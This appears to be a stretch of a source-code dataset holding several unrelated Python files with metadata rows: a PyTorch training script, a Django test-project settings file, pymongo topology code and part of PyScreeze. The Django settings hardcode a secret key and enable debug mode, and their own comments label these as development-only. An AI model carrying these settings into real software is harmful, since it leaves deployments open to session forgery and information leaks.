loss = (positive_weight * loss_fn(logit[positive_index], y[positive_index]) + loss_fn(logit[~positive_index], y[
~positive_index])) / len(X)
optimizer.zero_grad()
loss.backward()
optimizer.step()
# if batch % 100 == 0:
# loss = loss.item()
# print(
# f"{Fore.GREEN + '[train]===>'} loss: {loss} {'' + Fore.RESET}")
def valid(dataloader, model, loss_fn, device):
model.eval()
num_dataset = len(dataloader.dataset)
loss = 0
with torch.no_grad():
pred, Y = [], []
for batch, (X, y) in enumerate(dataloader):
X, y = X.to(device), y.to(device)
logit = model(X)
loss += loss_fn(logit, y).item()
pred.append(logit.argmax(1))
Y.append(y)
loss /= num_dataset
pred = torch.cat(pred)
Y = torch.cat(Y)
# metric = {'acc': 0, 'precision': 0, 'recall': 0, 'Fscore': 0}
# metric['acc'] = Accuracy(pred, Y)
# metric['precision'] = Precision(pred, Y)
# metric['recall'] = Recall(pred, Y)
# metric['Fscore'] = Fscore(pred, Y)
# print(f"{Fore.CYAN + '[valid]===>'} "
# f"loss: {loss} acc: {metric['acc']} precision: {metric['precision']} recall: {metric['recall']} fscore: {metric['Fscore']}"
# f"{'' + Fore.RESET}")
return P1(pred, Y), P0(pred, Y), Fscore(pred, Y)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--evol', action='store_true',
help="hyperparameters auto evolve")
parser.add_argument('--train', type=str,
default="../../data/unmodified/train.csv")
parser.add_argument('--valid', type=str,
default=f"../../data/unmodified/{rate}valid_balanced.csv")
parser.add_argument('--device', type=str,
default='cpu')
parser.add_argument('--in_feature', type=int,
default=28)
# parser.add_argument('--model', help="train with last model",
# type=str, default="./checkpoints/unevol/24_epoc.pt")
return parser.parse_args()
if __name__ == '__main__':
args = parse_args()
torch.manual_seed(777)
device = torch.device(args.device)
batch_size, in_features, out_features = 30, args.in_feature, 2
lr, positive_weight = 1e-3, 2.33
epochs = 300
loss_fn = (nn.CrossEntropyLoss()).to(device)
train_dataset = SeedDataset(args.train)
train_dataloader = DataLoader(
train_dataset, batch_size=batch_size, shuffle=True)
valid_dataset = SeedDataset(args.valid)
valid_dataloader = DataLoader(valid_dataset, batch_size=1, shuffle=False)
if(os.path.isdir(f"../../checkpoints") == 0):
os.mkdir(f"../../checkpoints")
if(os.path.isdir(f"../../checkpoints/baseline") == 0):
os.mkdir(f"../../checkpoints/baseline")
# Direct train
if args.evol == False:
print(
f"\nepochs: {epochs}\ndevice: {device}\nin_feature: {args.in_feature}\ntrain_set: {args.train}\nvalid_set: {args.valid}\n")
if(os.path.isdir("../../checkpoints/baseline/unevol") == 0):
os.mkdir("../../checkpoints/baseline/unevol")
model = Fake1DAttention(in_features, out_features).to(device)
optimizer = optim.Adagrad(model.parameters(), lr=lr)
for t in range(epochs):
# print(f"{Fore.GREEN + '===>'} Epoch {t + 1} {'' + Fore.RESET}\n"
# "---------------------------------------")
train(train_dataloader, model, loss_fn,
optimizer, device, positive_weight)
P1_, P0_, Fscore_ = valid(valid_dataloader, model, loss_fn, device)
record.loc[t] = (str(t), str(P1_), str(P0_), str(Fscore_))
torch.save(model.state_dict(),
f"../../checkpoints/baseline/unevol/{t}_epoc.pt")
record.to_csv("record.csv")
# Train after hyperparameter evolution
else:
if(os.path.isdir("../../checkpoints/baseline/evol") == 0):
os.mkdir("../../checkpoints/baseline/evol")
hyp = {'lr': 1e-3,
'positive_weight': 2.33}
# Hyperparameter evolution metadata (mutation scale 0-1, lower_limit, upper_limit)
meta = {'lr': (1, 1e-5, 1), # learning rate
'positive_weight': (1, 0.5, 5)}
# Hyperparameter evolution
for g in range(10):
model = Fake1DAttention(in_features, out_features).to(device)
if(os.path.isdir(f"../../checkpoints/baseline/evol/generate_{g}") == 0):
os.mkdir(f"../../checkpoints/baseline/evol/generate_{g}")
# Get hyperparameter from gene bank
lr, positive_weight = GetHyper(meta, hyp)
optimizer = optim.Adagrad(model.parameters(), lr=lr)
# Train
for t in range(30):
print(
"---------------------------------------\n"f"{Fore.GREEN + '===>'} Generate[{g}] --- Epoch{t + 1} {'' + Fore.RESET}:")
train(train_dataloader, model, loss_fn,
optimizer, device, positive_weight)
metric = valid(valid_dataloader, model, loss_fn, device)
torch.save(model.state_dict(),
f"../../checkpoints/baseline/evol/generate_{g}/{g}_{t}_epoc.pt")
# Update the gene bank with fitness values
Update_gene(hyp, metric)
# Train with best hyperparameters
x = np.loadtxt('evolve.txt', ndmin=2)
lr = x[0][4]
positive_weight = x[0][5]
print(
f"best hyperparameter : lr={lr} positive_weight={positive_weight}\n")
model = Fake1DAttention(in_features, out_features).to(device)
optimizer = optim.Adagrad(model.parameters(), lr=lr)
for t in range(epochs):
print(f"{Fore.GREEN + '===>'} Epoch {t + 1} {'' + Fore.RESET}\n"
"---------------------------------------")
train(train_dataloader, model, loss_fn,
optimizer, device, positive_weight)
valid(valid_dataloader, model, loss_fn, device)
if(os.path.isdir(f"../../checkpoints/baseline/evol/best/best_epoc_{t}.pt") == 0):
os.mkdir(
f"../../checkpoints/baseline/evol/best/best_epoc_{t}.pt")
torch.save(model.state_dict(),
f"../../checkpoints/baseline/evol/best/best_epoc_{t}.pt")
| 35.524887 | 144 | 0.562221 |
8eab8d0032392a0fdc73fd6f2e75ce07c249e85d | 3,751 | py | Python | test/project/settings.py | tylerlacy/bootstrap-uploadprogress | f563b1e6b55a6d6a4601ed4996a2429bb353a1a3 | [
"MIT"
] | null | null | null | test/project/settings.py | tylerlacy/bootstrap-uploadprogress | f563b1e6b55a6d6a4601ed4996a2429bb353a1a3 | [
"MIT"
] | null | null | null | test/project/settings.py | tylerlacy/bootstrap-uploadprogress | f563b1e6b55a6d6a4601ed4996a2429bb353a1a3 | [
"MIT"
] | null | null | null | """
Django settings for progress project.
Generated by 'django-admin startproject' using Django 1.10.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '!#s%vt0m5z801g5#i^^ov(y#y*j&&h04(zg^o(817i-o4t=bk6'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'crispy_forms',
'djangobower',
'project.progress'
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
CRISPY_TEMPLATE_PACK = 'bootstrap3'
BOWER_INSTALLED_APPS = (
'bootstrap#3.3',
'html5shiv',
'respond',
'bootstrap-filestyle',
# 'bootstrap-uploadprogress' # Use this in production.
)
# For bootstrap-uploadprogress.js
STATICFILES_DIRS = (
"../..",
)
BOWER_COMPONENTS_ROOT = os.path.join(BASE_DIR, 'components')
MEDIA_ROOT = os.path.join(BASE_DIR, 'upload')
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'djangobower.finders.BowerFinder',
)
| 25.006667 | 91 | 0.696614 |
eca7615206e300f7c6681200e12935bba8ba3826 | 20,631 | py | Python | pymongo/topology_description.py | tony/mongo-python-driver | d43ca118f91dda373356802ee8ec976d96c366b9 | [
"Apache-2.0"
] | 46 | 2019-03-01T02:19:18.000Z | 2021-12-18T12:37:02.000Z | pymongo/topology_description.py | tony/mongo-python-driver | d43ca118f91dda373356802ee8ec976d96c366b9 | [
"Apache-2.0"
] | 9 | 2019-12-05T00:49:12.000Z | 2021-09-08T01:31:25.000Z | pymongo/topology_description.py | tony/mongo-python-driver | d43ca118f91dda373356802ee8ec976d96c366b9 | [
"Apache-2.0"
] | 67 | 2018-10-29T09:50:49.000Z | 2022-01-06T07:35:56.000Z | # Copyright 2014-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you
# may not use this file except in compliance with the License. You
# may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
"""Represent a deployment of MongoDB servers."""
from collections import namedtuple
from pymongo import common
from pymongo.errors import ConfigurationError
from pymongo.read_preferences import ReadPreference
from pymongo.server_description import ServerDescription
from pymongo.server_selectors import Selection
from pymongo.server_type import SERVER_TYPE
TOPOLOGY_TYPE = namedtuple('TopologyType', ['Single', 'ReplicaSetNoPrimary',
'ReplicaSetWithPrimary', 'Sharded',
'Unknown'])(*range(5))
class TopologyDescription(object):
def __init__(self,
topology_type,
server_descriptions,
replica_set_name,
max_set_version,
max_election_id,
topology_settings):
"""Representation of a deployment of MongoDB servers.
:Parameters:
- `topology_type`: initial type
- `server_descriptions`: dict of (address, ServerDescription) for
all seeds
- `replica_set_name`: replica set name or None
- `max_set_version`: greatest setVersion seen from a primary, or None
- `max_election_id`: greatest electionId seen from a primary, or None
- `topology_settings`: a TopologySettings
"""
self._topology_type = topology_type
self._replica_set_name = replica_set_name
self._server_descriptions = server_descriptions
self._max_set_version = max_set_version
self._max_election_id = max_election_id
# The heartbeat_frequency is used in staleness estimates.
self._topology_settings = topology_settings
# Is PyMongo compatible with all servers' wire protocols?
self._incompatible_err = None
for s in self._server_descriptions.values():
if not s.is_server_type_known:
continue
# s.min/max_wire_version is the server's wire protocol.
# MIN/MAX_SUPPORTED_WIRE_VERSION is what PyMongo supports.
server_too_new = (
# Server too new.
s.min_wire_version is not None
and s.min_wire_version > common.MAX_SUPPORTED_WIRE_VERSION)
server_too_old = (
# Server too old.
s.max_wire_version is not None
and s.max_wire_version < common.MIN_SUPPORTED_WIRE_VERSION)
if server_too_new:
self._incompatible_err = (
"Server at %s:%d requires wire version %d, but this "
"version of PyMongo only supports up to %d."
% (s.address[0], s.address[1],
s.min_wire_version, common.MAX_SUPPORTED_WIRE_VERSION))
elif server_too_old:
self._incompatible_err = (
"Server at %s:%d reports wire version %d, but this "
"version of PyMongo requires at least %d (MongoDB %s)."
% (s.address[0], s.address[1],
s.max_wire_version,
common.MIN_SUPPORTED_WIRE_VERSION,
common.MIN_SUPPORTED_SERVER_VERSION))
break
# Server Discovery And Monitoring Spec: Whenever a client updates the
# TopologyDescription from an ismaster response, it MUST set
# TopologyDescription.logicalSessionTimeoutMinutes to the smallest
# logicalSessionTimeoutMinutes value among ServerDescriptions of all
# data-bearing server types. If any have a null
# logicalSessionTimeoutMinutes, then
# TopologyDescription.logicalSessionTimeoutMinutes MUST be set to null.
readable_servers = self.readable_servers
if not readable_servers:
self._ls_timeout_minutes = None
elif any(s.logical_session_timeout_minutes is None
for s in readable_servers):
self._ls_timeout_minutes = None
else:
self._ls_timeout_minutes = min(s.logical_session_timeout_minutes
for s in readable_servers)
def check_compatible(self):
"""Raise ConfigurationError if any server is incompatible.
A server is incompatible if its wire protocol version range does not
overlap with PyMongo's.
"""
if self._incompatible_err:
raise ConfigurationError(self._incompatible_err)
def has_server(self, address):
return address in self._server_descriptions
def reset_server(self, address):
"""A copy of this description, with one server marked Unknown."""
return updated_topology_description(self, ServerDescription(address))
def reset(self):
"""A copy of this description, with all servers marked Unknown."""
if self._topology_type == TOPOLOGY_TYPE.ReplicaSetWithPrimary:
topology_type = TOPOLOGY_TYPE.ReplicaSetNoPrimary
else:
topology_type = self._topology_type
# The default ServerDescription's type is Unknown.
sds = dict((address, ServerDescription(address))
for address in self._server_descriptions)
return TopologyDescription(
topology_type,
sds,
self._replica_set_name,
self._max_set_version,
self._max_election_id,
self._topology_settings)
def server_descriptions(self):
"""Dict of (address,
:class:`~pymongo.server_description.ServerDescription`)."""
return self._server_descriptions.copy()
@property
def topology_type(self):
"""The type of this topology."""
return self._topology_type
@property
def topology_type_name(self):
"""The topology type as a human readable string.
.. versionadded:: 3.4
"""
return TOPOLOGY_TYPE._fields[self._topology_type]
@property
def replica_set_name(self):
"""The replica set name."""
return self._replica_set_name
@property
def max_set_version(self):
"""Greatest setVersion seen from a primary, or None."""
return self._max_set_version
@property
def max_election_id(self):
"""Greatest electionId seen from a primary, or None."""
return self._max_election_id
@property
def logical_session_timeout_minutes(self):
"""Minimum logical session timeout, or None."""
return self._ls_timeout_minutes
@property
def known_servers(self):
"""List of Servers of types besides Unknown."""
return [s for s in self._server_descriptions.values()
if s.is_server_type_known]
@property
def has_known_servers(self):
"""Whether there are any Servers of types besides Unknown."""
return any(s for s in self._server_descriptions.values()
if s.is_server_type_known)
@property
def readable_servers(self):
"""List of readable Servers."""
return [s for s in self._server_descriptions.values() if s.is_readable]
@property
def common_wire_version(self):
"""Minimum of all servers' max wire versions, or None."""
servers = self.known_servers
if servers:
return min(s.max_wire_version for s in self.known_servers)
return None
@property
def heartbeat_frequency(self):
return self._topology_settings.heartbeat_frequency
def apply_selector(self, selector, address, custom_selector=None):
def apply_local_threshold(selection):
if not selection:
return []
settings = self._topology_settings
# Round trip time in seconds.
fastest = min(
s.round_trip_time for s in selection.server_descriptions)
threshold = settings.local_threshold_ms / 1000.0
return [s for s in selection.server_descriptions
if (s.round_trip_time - fastest) <= threshold]
if getattr(selector, 'min_wire_version', 0):
common_wv = self.common_wire_version
if common_wv and common_wv < selector.min_wire_version:
raise ConfigurationError(
"%s requires min wire version %d, but topology's min"
" wire version is %d" % (selector,
selector.min_wire_version,
common_wv))
if self.topology_type == TOPOLOGY_TYPE.Single:
# Ignore selectors for standalone.
return self.known_servers
elif address:
# Ignore selectors when explicit address is requested.
description = self.server_descriptions().get(address)
return [description] if description else []
elif self.topology_type == TOPOLOGY_TYPE.Sharded:
# Ignore read preference.
selection = Selection.from_topology_description(self)
else:
selection = selector(Selection.from_topology_description(self))
# Apply custom selector followed by localThresholdMS.
if custom_selector is not None and selection:
selection = selection.with_server_descriptions(
custom_selector(selection.server_descriptions))
return apply_local_threshold(selection)
def has_readable_server(self, read_preference=ReadPreference.PRIMARY):
"""Does this topology have any readable servers available matching the
given read preference?
:Parameters:
- `read_preference`: an instance of a read preference from
:mod:`~pymongo.read_preferences`. Defaults to
:attr:`~pymongo.read_preferences.ReadPreference.PRIMARY`.
.. note:: When connected directly to a single server this method
always returns ``True``.
.. versionadded:: 3.4
"""
common.validate_read_preference("read_preference", read_preference)
return any(self.apply_selector(read_preference, None))
def has_writable_server(self):
"""Does this topology have a writable server available?
.. note:: When connected directly to a single server this method
always returns ``True``.
.. versionadded:: 3.4
"""
return self.has_readable_server(ReadPreference.PRIMARY)
# If topology type is Unknown and we receive an ismaster response, what should
# the new topology type be?
_SERVER_TYPE_TO_TOPOLOGY_TYPE = {
SERVER_TYPE.Mongos: TOPOLOGY_TYPE.Sharded,
SERVER_TYPE.RSPrimary: TOPOLOGY_TYPE.ReplicaSetWithPrimary,
SERVER_TYPE.RSSecondary: TOPOLOGY_TYPE.ReplicaSetNoPrimary,
SERVER_TYPE.RSArbiter: TOPOLOGY_TYPE.ReplicaSetNoPrimary,
SERVER_TYPE.RSOther: TOPOLOGY_TYPE.ReplicaSetNoPrimary,
}
def updated_topology_description(topology_description, server_description):
"""Return an updated copy of a TopologyDescription.
:Parameters:
- `topology_description`: the current TopologyDescription
- `server_description`: a new ServerDescription that resulted from
an ismaster call
Called after attempting (successfully or not) to call ismaster on the
server at server_description.address. Does not modify topology_description.
"""
address = server_description.address
# These values will be updated, if necessary, to form the new
# TopologyDescription.
topology_type = topology_description.topology_type
set_name = topology_description.replica_set_name
max_set_version = topology_description.max_set_version
max_election_id = topology_description.max_election_id
server_type = server_description.server_type
# Don't mutate the original dict of server descriptions; copy it.
sds = topology_description.server_descriptions()
# Replace this server's description with the new one.
sds[address] = server_description
if topology_type == TOPOLOGY_TYPE.Single:
# Single type never changes.
return TopologyDescription(
TOPOLOGY_TYPE.Single,
sds,
set_name,
max_set_version,
max_election_id,
topology_description._topology_settings)
if topology_type == TOPOLOGY_TYPE.Unknown:
if server_type == SERVER_TYPE.Standalone:
sds.pop(address)
elif server_type not in (SERVER_TYPE.Unknown, SERVER_TYPE.RSGhost):
topology_type = _SERVER_TYPE_TO_TOPOLOGY_TYPE[server_type]
if topology_type == TOPOLOGY_TYPE.Sharded:
if server_type not in (SERVER_TYPE.Mongos, SERVER_TYPE.Unknown):
sds.pop(address)
elif topology_type == TOPOLOGY_TYPE.ReplicaSetNoPrimary:
if server_type in (SERVER_TYPE.Standalone, SERVER_TYPE.Mongos):
sds.pop(address)
elif server_type == SERVER_TYPE.RSPrimary:
(topology_type,
set_name,
max_set_version,
max_election_id) = _update_rs_from_primary(sds,
set_name,
server_description,
max_set_version,
max_election_id)
elif server_type in (
SERVER_TYPE.RSSecondary,
SERVER_TYPE.RSArbiter,
SERVER_TYPE.RSOther):
topology_type, set_name = _update_rs_no_primary_from_member(
sds, set_name, server_description)
elif topology_type == TOPOLOGY_TYPE.ReplicaSetWithPrimary:
if server_type in (SERVER_TYPE.Standalone, SERVER_TYPE.Mongos):
sds.pop(address)
topology_type = _check_has_primary(sds)
elif server_type == SERVER_TYPE.RSPrimary:
(topology_type,
set_name,
max_set_version,
max_election_id) = _update_rs_from_primary(sds,
set_name,
server_description,
max_set_version,
max_election_id)
elif server_type in (
SERVER_TYPE.RSSecondary,
SERVER_TYPE.RSArbiter,
SERVER_TYPE.RSOther):
topology_type = _update_rs_with_primary_from_member(
sds, set_name, server_description)
else:
# Server type is Unknown or RSGhost: did we just lose the primary?
topology_type = _check_has_primary(sds)
# Return updated copy.
return TopologyDescription(topology_type,
sds,
set_name,
max_set_version,
max_election_id,
topology_description._topology_settings)
def _update_rs_from_primary(
sds,
replica_set_name,
server_description,
max_set_version,
max_election_id):
"""Update topology description from a primary's ismaster response.
Pass in a dict of ServerDescriptions, current replica set name, the
ServerDescription we are processing, and the TopologyDescription's
max_set_version and max_election_id if any.
Returns (new topology type, new replica_set_name, new max_set_version,
new max_election_id).
"""
if replica_set_name is None:
replica_set_name = server_description.replica_set_name
elif replica_set_name != server_description.replica_set_name:
# We found a primary but it doesn't have the replica_set_name
# provided by the user.
sds.pop(server_description.address)
return (_check_has_primary(sds),
replica_set_name,
max_set_version,
max_election_id)
max_election_tuple = max_set_version, max_election_id
if None not in server_description.election_tuple:
if (None not in max_election_tuple and
max_election_tuple > server_description.election_tuple):
# Stale primary, set to type Unknown.
address = server_description.address
sds[address] = ServerDescription(address)
return (_check_has_primary(sds),
replica_set_name,
max_set_version,
max_election_id)
max_election_id = server_description.election_id
if (server_description.set_version is not None and
(max_set_version is None or
server_description.set_version > max_set_version)):
max_set_version = server_description.set_version
# We've heard from the primary. Is it the same primary as before?
for server in sds.values():
if (server.server_type is SERVER_TYPE.RSPrimary
and server.address != server_description.address):
# Reset old primary's type to Unknown.
sds[server.address] = ServerDescription(server.address)
# There can be only one prior primary.
break
# Discover new hosts from this primary's response.
for new_address in server_description.all_hosts:
if new_address not in sds:
sds[new_address] = ServerDescription(new_address)
# Remove hosts not in the response.
for addr in set(sds) - server_description.all_hosts:
sds.pop(addr)
# If the host list differs from the seed list, we may not have a primary
# after all.
return (_check_has_primary(sds),
replica_set_name,
max_set_version,
max_election_id)
def _update_rs_with_primary_from_member(
sds,
replica_set_name,
server_description):
"""RS with known primary. Process a response from a non-primary.
Pass in a dict of ServerDescriptions, current replica set name, and the
ServerDescription we are processing.
Returns new topology type.
"""
assert replica_set_name is not None
if replica_set_name != server_description.replica_set_name:
sds.pop(server_description.address)
elif (server_description.me and
server_description.address != server_description.me):
sds.pop(server_description.address)
# Had this member been the primary?
return _check_has_primary(sds)
def _update_rs_no_primary_from_member(
sds,
replica_set_name,
server_description):
"""RS without known primary. Update from a non-primary's response.
Pass in a dict of ServerDescriptions, current replica set name, and the
ServerDescription we are processing.
Returns (new topology type, new replica_set_name).
"""
topology_type = TOPOLOGY_TYPE.ReplicaSetNoPrimary
if replica_set_name is None:
replica_set_name = server_description.replica_set_name
elif replica_set_name != server_description.replica_set_name:
sds.pop(server_description.address)
return topology_type, replica_set_name
# This isn't the primary's response, so don't remove any servers
# it doesn't report. Only add new servers.
for address in server_description.all_hosts:
if address not in sds:
sds[address] = ServerDescription(address)
if (server_description.me and
server_description.address != server_description.me):
sds.pop(server_description.address)
return topology_type, replica_set_name
def _check_has_primary(sds):
"""Current topology type is ReplicaSetWithPrimary. Is primary still known?
Pass in a dict of ServerDescriptions.
Returns new topology type.
"""
for s in sds.values():
if s.server_type == SERVER_TYPE.RSPrimary:
return TOPOLOGY_TYPE.ReplicaSetWithPrimary
else:
return TOPOLOGY_TYPE.ReplicaSetNoPrimary
| 37.785714 | 79 | 0.643255 |
de20db9d20b3fea301e302fd208e22c155e603ef | 23,323 | py | Python | venv/Lib/site-packages/pyscreeze/__init__.py | SteevenBrunner/gmail-generator | 0ab6f047faad48c388c6d7d2b887f33b6839b6f9 | [
"MIT"
] | 102 | 2018-11-06T21:54:27.000Z | 2022-02-26T16:35:06.000Z | venv/Lib/site-packages/pyscreeze/__init__.py | AsterLaoWhy/Navi | 819e4cc9e70721d65da5979e0c7a6fead9eb9d6e | [
"MIT"
] | 26 | 2018-10-09T13:40:18.000Z | 2021-10-16T23:28:26.000Z | venv/Lib/site-packages/pyscreeze/__init__.py | AsterLaoWhy/Navi | 819e4cc9e70721d65da5979e0c7a6fead9eb9d6e | [
"MIT"
] | 36 | 2018-08-08T03:43:00.000Z | 2022-02-02T16:29:55.000Z | # PyScreeze
"""
NOTE:
Apparently Pillow support on Ubuntu 64-bit has several additional steps since it doesn't have JPEG/PNG support out of the box. Description here:
https://stackoverflow.com/questions/7648200/pip-install-pil-e-tickets-1-no-jpeg-png-support
http://ubuntuforums.org/showthread.php?t=1751455
"""
__version__ = '0.1.26'
import collections
import datetime
import functools
import os
import subprocess
import sys
import time
import errno
from contextlib import contextmanager
try:
from PIL import Image
from PIL import ImageOps
from PIL import ImageDraw
if sys.platform == 'win32': # TODO - Pillow now supports ImageGrab on macOS.
from PIL import ImageGrab
_PILLOW_UNAVAILABLE = False
except ImportError:
# We ignore this because failures due to Pillow not being installed
# should only happen when the functions that specifically depend on
# Pillow are called. The main use case is when PyAutoGUI imports
# PyScreeze, but Pillow isn't installed because the user is running
# some platform/version of Python that Pillow doesn't support, then
# importing PyAutoGUI should not automatically fail because it
# imports PyScreeze.
# So we have a `pass` statement here since a failure to import
# Pillow shouldn't crash PyScreeze.
_PILLOW_UNAVAILABLE = True
try:
import cv2, numpy
useOpenCV = True
RUNNING_CV_2 = cv2.__version__[0] < '3'
except ImportError:
useOpenCV = False
RUNNING_PYTHON_2 = sys.version_info[0] == 2
if useOpenCV:
if RUNNING_CV_2:
LOAD_COLOR = cv2.CV_LOAD_IMAGE_COLOR
LOAD_GRAYSCALE = cv2.CV_LOAD_IMAGE_GRAYSCALE
else:
LOAD_COLOR = cv2.IMREAD_COLOR
LOAD_GRAYSCALE = cv2.IMREAD_GRAYSCALE
if not RUNNING_PYTHON_2:
unicode = str # On Python 3, all the isinstance(spam, (str, unicode)) calls will work the same as Python 2.
if sys.platform == 'win32':
# On Windows, the monitor scaling can be set to something besides normal 100%.
# PyScreeze and Pillow needs to account for this to make accurate screenshots.
# TODO - How does macOS and Linux handle monitor scaling?
import ctypes
try:
ctypes.windll.user32.SetProcessDPIAware()
except AttributeError:
pass # Windows XP doesn't support monitor scaling, so just do nothing.
GRAYSCALE_DEFAULT = False
# For version 0.1.19 I changed it so that ImageNotFoundException was raised
# instead of returning None. In hindsight, this change came too late, so I'm
# changing it back to returning None. But I'm also including this option for
# folks who would rather have it raise an exception.
USE_IMAGE_NOT_FOUND_EXCEPTION = False
scrotExists = False
try:
if sys.platform not in ('java', 'darwin', 'win32'):
whichProc = subprocess.Popen(
['which', 'scrot'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
scrotExists = whichProc.wait() == 0
except OSError as ex:
if ex.errno == errno.ENOENT:
# if there is no "which" program to find scrot, then assume there
# is no scrot.
pass
else:
raise
if sys.platform == 'win32':
from ctypes import windll
# win32 DC(DeviceContext) Manager
@contextmanager
def __win32_openDC(hWnd):
"""
TODO
"""
hDC = windll.user32.GetDC(hWnd)
if hDC == 0: #NULL
raise WindowsError("windll.user32.GetDC failed : return NULL")
try:
yield hDC
finally:
if windll.user32.ReleaseDC(hWnd, hDC) == 0:
raise WindowsError("windll.user32.ReleaseDC failed : return 0")
Box = collections.namedtuple('Box', 'left top width height')
Point = collections.namedtuple('Point', 'x y')
RGB = collections.namedtuple('RGB', 'red green blue')
class PyScreezeException(Exception):
pass # This is a generic exception class raised when a PyScreeze-related error happens.
class ImageNotFoundException(PyScreezeException):
pass # This is an exception class raised when the locate functions fail to locate an image.
def requiresPillow(wrappedFunction):
"""
A decorator that marks a function as requiring Pillow to be installed.
This raises PyScreezeException if Pillow wasn't imported.
"""
@functools.wraps(wrappedFunction)
def wrapper(*args, **kwargs):
if _PILLOW_UNAVAILABLE:
raise PyScreezeException('The Pillow package is required to use this function.')
return wrappedFunction(*args, **kwargs)
return wrapper
def _load_cv2(img, grayscale=None):
"""
TODO
"""
# load images if given filename, or convert as needed to opencv
# Alpha layer just causes failures at this point, so flatten to RGB.
# RGBA: load with -1 * cv2.CV_LOAD_IMAGE_COLOR to preserve alpha
# to matchTemplate, need template and image to be the same wrt having alpha
if grayscale is None:
grayscale = GRAYSCALE_DEFAULT
if isinstance(img, (str, unicode)):
# The function imread loads an image from the specified file and
# returns it. If the image cannot be read (because of missing
# file, improper permissions, unsupported or invalid format),
# the function returns an empty matrix
# http://docs.opencv.org/3.0-beta/modules/imgcodecs/doc/reading_and_writing_images.html
if grayscale:
img_cv = cv2.imread(img, LOAD_GRAYSCALE)
else:
img_cv = cv2.imread(img, LOAD_COLOR)
if img_cv is None:
raise IOError("Failed to read %s because file is missing, "
"has improper permissions, or is an "
"unsupported or invalid format" % img)
elif isinstance(img, numpy.ndarray):
# don't try to convert an already-gray image to gray
if grayscale and len(img.shape) == 3: # and img.shape[2] == 3:
img_cv = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
else:
img_cv = img
elif hasattr(img, 'convert'):
# assume its a PIL.Image, convert to cv format
img_array = numpy.array(img.convert('RGB'))
img_cv = img_array[:, :, ::-1].copy() # -1 does RGB -> BGR
if grayscale:
img_cv = cv2.cvtColor(img_cv, cv2.COLOR_BGR2GRAY)
else:
raise TypeError('expected an image filename, OpenCV numpy array, or PIL image')
return img_cv
def _locateAll_opencv(needleImage, haystackImage, grayscale=None, limit=10000, region=None, step=1,
confidence=0.999):
"""
TODO - rewrite this
faster but more memory-intensive than pure python
step 2 skips every other row and column = ~3x faster but prone to miss;
to compensate, the algorithm automatically reduces the confidence
threshold by 5% (which helps but will not avoid all misses).
limitations:
- OpenCV 3.x & python 3.x not tested
- RGBA images are treated as RBG (ignores alpha channel)
"""
if grayscale is None:
grayscale = GRAYSCALE_DEFAULT
confidence = float(confidence)
needleImage = _load_cv2(needleImage, grayscale)
needleHeight, needleWidth = needleImage.shape[:2]
haystackImage = _load_cv2(haystackImage, grayscale)
if region:
haystackImage = haystackImage[region[1]:region[1]+region[3],
region[0]:region[0]+region[2]]
else:
region = (0, 0) # full image; these values used in the yield statement
if (haystackImage.shape[0] < needleImage.shape[0] or
haystackImage.shape[1] < needleImage.shape[1]):
# avoid semi-cryptic OpenCV error below if bad size
raise ValueError('needle dimension(s) exceed the haystack image or region dimensions')
if step == 2:
confidence *= 0.95
needleImage = needleImage[::step, ::step]
haystackImage = haystackImage[::step, ::step]
else:
step = 1
# get all matches at once, credit: https://stackoverflow.com/questions/7670112/finding-a-subimage-inside-a-numpy-image/9253805#9253805
result = cv2.matchTemplate(haystackImage, needleImage, cv2.TM_CCOEFF_NORMED)
match_indices = numpy.arange(result.size)[(result > confidence).flatten()]
